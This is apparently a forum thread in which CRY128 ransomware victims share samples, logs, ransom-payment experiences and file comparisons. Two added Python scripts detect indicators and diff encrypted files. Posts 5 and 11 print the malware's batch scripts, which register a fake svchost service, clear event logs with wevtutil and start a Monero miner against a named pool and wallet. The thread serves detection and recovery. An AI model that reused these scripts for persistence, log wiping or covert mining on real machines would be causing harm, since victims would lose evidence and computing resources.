mclaugb
  1. Hi Folks, I'm not sure if these files will help, but I've posted all of the virus files, ID, decryption key (provided by the scammers), etc. I'm hopeful that this will help those with the expertise to save others time and money. But it was a horrible experience with CRY128 which I hope will guide others in how the scam can be cracked. I had no backup and was in a time pinch at our company, so I could not wait it out for a crack. I also use R-soft tools for recovery and found some files, but unfortunately R-soft cannot recognize common engineering formatted files, so it couldn't find those.

     First I found the virus files wreaking havoc by looking at Endpoint Security logs and Windows System / App logs. The smoking gun appeared to be pointed at a c:\windows\dell folder containing some batch files. Also a file 15321.exe kept appearing in my c:\ directory (all of these files are zipped in folder VIRUS_FILES). I password protected the ZIP file with the word "infected" so that no accidents happen.

     In a pinch, I had to pay the ransom. Using the Tor browser, the Ransom page asks you to enter your FILE ID. In my case, all files were named "*1638578921*.onion". You can play with the attached encrypted files and the decryptor. The TOR Browser pulls up a "Decrypt panel". The ID KEY must be typed in (in my case 1638578921). There is then a "Show code" box which currently displays "35352" with a blank box. You must re-enter the code in that box. (Presumably this is used in some way to generate the key.) You then press enter and it provides you with an address to send the bitcoins to. Note, the number was the same when I visited the webpage multiple times within a 24 hour period, but I think it has changed. Once paid, it provides you three files to download. (I have attached all three versions in the zip file.) I have attached the instruction page (after you pay) and the "decrypt" password for all of the decryption software.

     Your [...] The decryptor does not work, as you will see, without checking the "ignore checksum" box. Then it decrypts the files just fine. Anyway, I hope this helps. Bryan

     Attachments: CRY128_FILES_UNLOCK.zip, README.TXT.txt
  2. Did you get the 15321.exe file and the two batch files? The svchost.exe was being called by that batch file every 2 minutes in my firewall logs once the virus hit. I'm going to upload a packet of files tomorrow: the decryptor, pre-decrypted files, and post-decrypted files. They are mostly ASCII files, so they are very easy to read with a hex editor. Maybe having one solution to the encryption will help folks generate a decryptor. There is a 4 digit number the ransomware generates when you login to pay. That likely is used in the unlock key.
  3. Dear all, I couldn't agree more with your comments about not really having the right to complain. I have complained to the other companies as well, namely McAfee, as their product totally failed and was disabled by this tool altogether. Sarah posting her note was encouraging, but it was the first indication at all on the forums that there was any hope. I guess I was a little surprised that nobody from the company reached out to ask for any of the executables, file logs, etc. I guess I inferred from that that either they didn't care, weren't working on it, or already had them and did not need them. So Sarah's note saying they were working on it was definitely encouraging! Lots of companies make free tools in order to get their brand and their name out such that their products will be purchased. I, for example, am considering buying site licenses for Emsisoft products. So "free" tools do ultimately tie into a business model. Good for Emsisoft. Again, if anyone wants encrypted files, decrypted files, keys, or the decrypting engine, do let me know if I can benefit the community through the ransom I paid. Thank you, Emsisoft, again for your efforts. Bryan
  4. I finally gave in to the scam as our business did not have a backup and had some time sensitive materials. EMSISOFT, it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc. I find it a little frustrating that few if any of your team are even on these forums. Maybe we're too incapable of helping you, but some updating would be nice. Anyway, I saved all of the decrypt exe files locally that the criminals gave me, my user number (the number in all the filenames), and a >256 character keystring that the hacker website provided me. The ransom allows you to download the decrypter exe for three different filetype extensions. Mine are a bolal4nd.onion type, so I used that exe. The hardest thing was actually buying bitcoins and getting that done reasonably quickly. I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase. Cost about $275 bucks all in all, but I had put 20 hours into this, a new hard drive, etc. For the record, the criminals' tool did not initially decrypt the files correctly; it failed giving an error. But there is a little checkbox "ignore checksum" that, when clicked, says it "may ruin the files". I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files. The files opened near perfectly (some minor property information was lost), but it worked just fine and I have my files back. Now I have it running on the whole hard drive. The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you. I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT, SEND ME A MESSAGE IF YOU ARE INTERESTED.
  5. Here is the Windows script mine was running.

     run.bat:

     ```bat
     echo Havefun
     REM registers the dropped svchost.exe as a service that runs run64.bat
     C:\Windows\dell\svchost.exe install "Windows32_Update" "C:\Windows\dell\run64.bat"
     C:\Windows\dell\svchost.exe start Windows32_Update
     REM clears three Windows event logs to cover its tracks
     wevtutil cl "windows powershell"
     wevtutil cl "security"
     wevtutil cl "system"
     echo Havefun
     ```

     run64.bat:

     ```bat
     REM starts the miner against a Monero pool with the attacker's wallet
     Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1
     ```

     Then repeated calls to the svchost.exe.
  6. I have the exe's if you are interested. I'm not going to post them for everyone, but I'll send them to individuals.
  7. Here are a few text files that got hit by the ransomware. It is very easy to tell where the information was added/removed/etc. I also have 4 exe and other files I have zipped up in case anyone wants to run the ransomware on a VM and see how it works.

     Attachments: 3X8Sheep_Base_SingleBlock.dxf, 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._
  8. I ran R-soft deleted files recovery in case the ransomware had deleted the old files and left the file system table. It came up with some deleted files, but most are not readable; some were, but all the old filenames are gone. I did find some easy files to compare using a DIFF function in a hex editor. These files are mostly ASCII text files (they were AutoCAD files), so they make it very easy to see what the ransomware did. If any of you know how to decrypt codes, these should be two easy files to look at.

     Attachments: 3X8Sheep_Base_SingleBlock.dxf, 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._
  9. I am posting the infected files here. I have attached them here in "dell_Infected.zip". The zip file requires a password "infected" to open it. Please use with caution as they are infected .exe files with the CRY128 virus.

     Attachment: dell_Infected.zip
  10. I can post the .exe files from this folder if anyone wants them. I submitted them to Emsisoft's website. But I don't want to infect others.
  11. Okay, here are some more data points for you anti-virus making people. McAfee, your tools are not detecting this one. These are logs from Windows Application Logs:

      ```text
      Started svchost.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8888 -u 48aNFV3juaCLLQF8zPtdwdgvxt3YX1HmC3nvCu9psPuBDcoEBJGps3YFKU2diFBLby7WoQUqAo3ZP1Z3ay9yt2fDVAaWBuj -p x for service Mysqlvers in C:\windows.
      Started C:\Windows\dell\run64.bat for service Windows32_Update in C:\Windows\dell.
      ```

      The bat file says:

      ```bat
      Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1
      ```

      In c:\windows\dell there is 'run.bat', 'run64.bat', 'svchost.exe'.

      Other Windows application logs show:

      ```text
      C:\Windows\systxm\winlogon.exe NT AUTHORITY\SYSTEM ran C:\Windows\svchoot.exe, which attempted to access C:\Windows\systxm\svchost.exe.
      The potentially unwanted program named CoinMiner was detected and deleted.
      Mysqlvers 1500 2000
      Mysqlvers 0
      Restart svchost.exe
      ```
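The run.bat in post 5 and the Application log entries in post 11 give a defender four concrete things to look for: a mining-pool URL or cryptonight switch on a command line, wevtutil clearing event logs, a service whose binary is a batch file, and system binary names (svchost.exe, winlogon.exe) living outside System32, including near-miss spellings such as "svchoot.exe". The script below is an added example written for this thread; it is not code from the original posts or from Emsisoft. The sample log lines are constructed, modeled on the fragments quoted above, with the wallet address replaced by a placeholder.

```python
import re
from difflib import SequenceMatcher

# Constructed sample lines, modeled on the Application log fragments and the
# run.bat quoted in the thread. The wallet address is replaced by a placeholder.
SAMPLE_LOG = "\n".join([
    r"Started C:\Windows\dell\run64.bat for service Windows32_Update in C:\Windows\dell.",
    r"Started svchost.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8888 -u WALLET_PLACEHOLDER -p x for service Mysqlvers in C:\windows.",
    r"C:\Windows\systxm\winlogon.exe NT AUTHORITY\SYSTEM ran C:\Windows\svchoot.exe, which attempted to access C:\Windows\systxm\svchost.exe.",
    r"Started C:\Windows\System32\svchost.exe -k netsvcs for service Schedule in C:\Windows\System32.",
    r'wevtutil cl "security"',
])

# Mining pool URL scheme or the cryptonight algorithm switch on a command line.
MINER_RE = re.compile(r"stratum\+tcp://|\s-a\s+cryptonight\b", re.IGNORECASE)
# "wevtutil cl <log>" wipes an event log; run.bat did this for three logs.
LOGCLEAR_RE = re.compile(r"\bwevtutil(?:\.exe)?\s+cl\b", re.IGNORECASE)
# "Started <binary> ... for service <name>", as the quoted log phrased it.
SERVICE_RE = re.compile(r"Started\s+(\S+)\s.*?for service\s+(\S+)", re.IGNORECASE)
# Any drive-letter path ending in .exe.
PATH_RE = re.compile(r"[A-Za-z]:\\(?:[^\\\s,\"]+\\)*[^\\\s,\"]+\.exe", re.IGNORECASE)

# Names the genuine OS binaries use, and the only directories they live in.
SYSTEM_BINARIES = {"svchost.exe", "winlogon.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def analyze_line(line):
    """Return the indicator tags that fire on one log line (empty if none)."""
    findings = []
    if MINER_RE.search(line):
        findings.append("miner-cmdline")
    if LOGCLEAR_RE.search(line):
        findings.append("eventlog-cleared")
    svc = SERVICE_RE.search(line)
    if svc and svc.group(1).lower().endswith((".bat", ".cmd")):
        findings.append("service-runs-script:" + svc.group(2))
    for path in PATH_RE.findall(line):
        directory, _, name = path.lower().rpartition("\\")
        if name in SYSTEM_BINARIES:
            # A real svchost.exe/winlogon.exe never runs from C:\Windows\dell or \systxm.
            if directory not in SYSTEM_DIRS:
                findings.append("system-name-outside-system32:" + path)
        else:
            # Near-miss spellings of system binary names (svchoot.exe ~ svchost.exe).
            for known in SYSTEM_BINARIES:
                if SequenceMatcher(None, name, known).ratio() >= 0.85:
                    findings.append("lookalike:%s~%s" % (path, known))
    return findings


def scan(text):
    """Map 1-based line numbers to their findings, skipping clean lines."""
    hits = {}
    for number, line in enumerate(text.splitlines(), start=1):
        findings = analyze_line(line)
        if findings:
            hits[number] = findings
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print("line %d: %s" % (number, ", ".join(findings)))
```

Run against the sample, lines 1, 2, 3 and 5 each produce findings and the genuine System32 svchost.exe on line 4 stays quiet. Feed it exported Application log text or a pasted batch file instead of SAMPLE_LOG to triage a box the same way the posts above did by hand.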
  12. We're finding that many of the encrypted files are the exact same filesize as the unencrypted originals. See the attached files.

      Attachments: 3X8Sheep_Base_SingleBlock.dxf, 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._
  13. I have the same issue with my files renamed *_gebdp3k7bolalnd4.onion. So far I cannot find the malicious exe file. McAfee and Malwarebytes so far have come up with no threats. I checked the McAfee Endpoint Security Logs and somehow the attack appeared to disable on-access scanning. The firewall event monitor also picked up the ports in the attached. So this should help folks identify one method this is getting in and disabling all McAfee tools so that it can run.

      Attachments: FirewallEventMonitor.log, EndpointSecurityPlatform_Activity.log, OnDemandScan_Activity.log, ThreatPrevention_Activity.log
  14. My files have the same gebdp3k7bolalnd4.onion._ extensions. Mine was a Windows machine with Remote Desktop connections disabled but Remote Assistance enabled. I consider myself very computer savvy, but so far I've found no applications, no processes running in the background. Malwarebytes and McAfee both cannot detect this strain. Files do not appear to be any specific number of kb larger than the originals (it seems to vary depending on the file). The Cry128 decrypter attempted two sets of files without success. I've attached a few files here. I can come up with more of them.

      Attachments: Bobbin REV 6 Specification print.pdf, Bobbin REV 6 Specification print.pdf.id_1638578921_gebdp3k7bolalnd4.onion._, TDS-DC25-UB25-RW-MAC-07-2014.pdf, TDS-DC25-UB25-RW-MAC-07-2014.pdf.id_1638578921_gebdp3k7bolalnd4.onion._
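Posts 8, 12 and 14 make two observations a hex-editor diff can turn into numbers: some encrypted files are exactly the size of the originals and mostly still readable, while others grow by a variable amount. The script below is an added example for this thread, not code from the posts or from Emsisoft, and it assumes nothing about how CRY128 actually transforms a file. It builds a constructed DXF-like sample, derives one suspect with only its first 64 bytes overwritten (same size) and one with a trailer appended (larger), then reports every changed region with the byte entropy on each side, which is the quick way to tell an intact text region from one holding ciphertext.

```python
import math
from difflib import SequenceMatcher

# Constructed stand-in for a small DXF header: 48 bytes repeated four times (192 bytes).
ORIGINAL = b"0\nSECTION\n2\nHEADER\n9\n$ACADVER\n1\nAC1024\n0\nENDSEC\n" * 4

# Suspect 1 (constructed): same length, first 64 bytes overwritten with a keystream
# that is never zero at these offsets, so every one of those bytes differs.
_scrambled_head = bytes(b ^ ((i * 37 + 11) & 0xFF) for i, b in enumerate(ORIGINAL[:64]))
SAME_SIZE_SUSPECT = _scrambled_head + ORIGINAL[64:]

# Suspect 2 (constructed): content untouched, a trailer appended at the end.
APPENDED_SUSPECT = ORIGINAL + b"\x00" * 16 + b"id_1638578921"


def entropy(data):
    """Shannon entropy in bits per byte: roughly 4 for text, close to 8 for ciphertext."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def changed_regions(original, suspect):
    """Non-equal regions as (tag, orig_start, orig_end, suspect_start, suspect_end).

    Equal-length files are compared byte for byte, which is what a hex-editor diff
    does; otherwise a sequence match also reports inserted and deleted ranges."""
    if len(original) == len(suspect):
        regions, start = [], None
        for i, (a, b) in enumerate(zip(original, suspect)):
            if a != b and start is None:
                start = i
            elif a == b and start is not None:
                regions.append(("replace", start, i, start, i))
                start = None
        if start is not None:
            regions.append(("replace", start, len(original), start, len(original)))
        return regions
    matcher = SequenceMatcher(None, original, suspect, autojunk=False)
    return [op for op in matcher.get_opcodes() if op[0] != "equal"]


def summarize(original, suspect):
    """One row per changed region, with entropy of both sides for a quick ciphertext check."""
    return [
        {
            "change": tag,
            "orig_range": (o1, o2),
            "suspect_range": (s1, s2),
            "orig_entropy": round(entropy(original[o1:o2]), 2),
            "suspect_entropy": round(entropy(suspect[s1:s2]), 2),
        }
        for tag, o1, o2, s1, s2 in changed_regions(original, suspect)
    ]


def intact_fraction(original, suspect):
    """Share of the original's bytes that survive unchanged in the suspect file."""
    touched = sum(o2 - o1 for _, o1, o2, _, _ in changed_regions(original, suspect))
    return (len(original) - touched) / len(original)


if __name__ == "__main__":
    for label, suspect in (("same size", SAME_SIZE_SUSPECT), ("appended", APPENDED_SUSPECT)):
        print(label, summarize(ORIGINAL, suspect), "intact:", round(intact_fraction(ORIGINAL, suspect), 3))
```

To use it on a real pair, read the original and the renamed file with open(path, "rb") and pass the two byte strings; for very large files the byte-for-byte path is fast, while the SequenceMatcher fallback is only meant for files of modest size. A region whose entropy jumps to well above the original's is the part to hand to someone working on a decrypter; the rest of the file is plaintext that never needed decrypting.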